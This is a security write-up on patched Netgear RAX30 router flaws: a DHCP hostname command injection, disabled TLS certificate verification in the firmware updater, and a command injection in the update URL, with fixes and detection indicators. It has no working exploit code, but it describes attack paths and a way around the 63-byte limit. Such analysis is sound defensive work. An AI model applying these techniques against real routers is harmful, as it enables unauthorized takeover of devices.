Full Report
The authors of this post come from Star Labs - a usual team at Pwn2Own. They detail several cool vulnerabilities that were patched a little bit before the event. They targeted a Netgear router, in this case. From the LAN side, many services including upnp, hostapd, smb and others are exposed. From reverse engineering a binary in Ghidra, they discovered that the hostname field has a command injection vulnerability. However, they are only given 63 bytes to work with. One thing I would have considered doing is constantly appending to a file until it is large enough. Then, executing the binary once we're done. In this case, they simply created a file. Sadly, this was fixed. The fix used execve instead of system. They did a good job fixing this issue. While reviewing the device, they noticed a plethora of out bound connections to several netgear domains on the WAN interface. One of the domains was responsible for checking for firmware updates. While using the curl library to make these requests, two crucial settings are turned off: CURLOPT_SSL_VERIFYHOST and CURLOPT_SSL_VERIFYPEER. Since the certificate verification is turned off, an attacker can setup a fake DHCP and DNS server to impersonate the update server. The firmware is likely signed... the point is that this opens up an entirely new attack avenue though! When performing the firmware update, several requests are made to the update server. One of these is a URL for downloading files. This input is vulnerable to a command injection vulnerability though! This was also fixed by using execve instead of system though. What's strange about this fix is that it is NOT complete. The root cause of the problem is the lack of certificate verification. As a result, the patch wasn't sufficient, allowing for a malicious firmware image to be sent to the device. The caveat is that the bug can only be exploited once per day (lolz). Overall, a trivial list of bugs in the Netgear router. Interesting to see such bad bugs inside of such a popular product though.
Analysis Summary
# Vulnerability: Multiple Command Injections and Broken Trust via Netgear RAX30 Services
## CVE Details
- **CVE ID**: Not explicitly numbered in the provided text (pre-emptively patched before Pwn2Own Toronto 2022). Referenced as "Netgear RAX30 LAN/WAN Bugs."
- **CVSS Score**: Estimated 8.8 - 9.8 (Critical)
- **CWE**:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- CWE-295: Improper Certificate Validation
## Affected Systems
- **Products**: Netgear RAX30 Router
- **Versions**: Version 1.0.7.78 and earlier.
- **Configurations**: Default LAN exposure for DHCP; WAN exposure for automated firmware update checks.
## Vulnerability Description
Security researchers identified a chain of vulnerabilities affecting both the Local Area Network (LAN) and Wide Area Network (WAN) interfaces:
1. **DHCP Hostname Injection (LAN)**: The `dhcpd` service fails to sanitize the `DHCP_HOST_NAME` option from a `DHCPREQUEST` packet. This field is passed to a system call, allowing for arbitrary command execution. The exploit is limited by a 63-byte buffer.
2. **Improper SSL Validation (WAN)**: The firmware update mechanism uses the `curl` library with `CURLOPT_SSL_VERIFYHOST` and `CURLOPT_SSL_VERIFYPEER` disabled. This allows a Man-In-The-Middle (MITM) attacker to impersonate Netgear update servers.
3. **Firmware Update URL Injection (WAN)**: During the update process, the URL used for downloading firmware files is vulnerable to command injection through the `pegaSystem` function (a wrapper for `system()`).
## Exploitation
- **Status**: PoC available (developed by STAR Labs for Pwn2Own).
- **Complexity**: Low to Medium.
- **Attack Vector**:
- **LAN**: Adjacent (requires connection to the local network).
- **WAN**: Network (requires MITM capabilities, such as DNS/DHCP spoofing).
## Impact
- **Confidentiality**: High (Full system access)
- **Integrity**: High (Ability to flash malicious firmware images)
- **Availability**: High (Device rebooting and potential bricking)
## Remediation
### Patches
- Netgear has released updated firmware versions (post-1.0.7.78) to address these issues.
- **Method of Fix**: The vendor replaced `system()` calls with `execve()` to prevent shell expansion of malicious input.
### Workarounds
- **Disable Auto-Updates**: Manually check for firmware updates from a trusted connection to minimize the WAN attack surface.
- **Access Control**: Ensure the LAN is restricted to trusted devices to prevent DHCP-based exploitation.
## Detection
- **Indicators of Compromise**:
- Unusual outbound connections to non-standard IP addresses during firmware update checks.
- DHCP logs showing malformed or excessively long hostnames containing shell metacharacters (e.g., `;`, `` ` ``, `$()`).
- **Detection Methods**: Monitor network traffic for unverified TLS connections originating from the router to `netgear.com` subdomains.
## References
- Netgear Support: [https://kb.netgear.com/000064989/RAX30-Firmware-Version-1-0-7-78](https://kb.netgear.com/000064989/RAX30-Firmware-Version-1-0-7-78)
- STAR Labs Blog: [https://starlabs.sg/blog/2022/12-the-last-breath-of-our-netgear-rax30-bugs-a-tragic-tale-before-pwn2own-toronto-2022/](https://starlabs.sg/blog/2022/12-the-last-breath-of-our-netgear-rax30-bugs-a-tragic-tale-before-pwn2own-toronto-2022/)
- Netgear GPL Source: [https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL](https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL)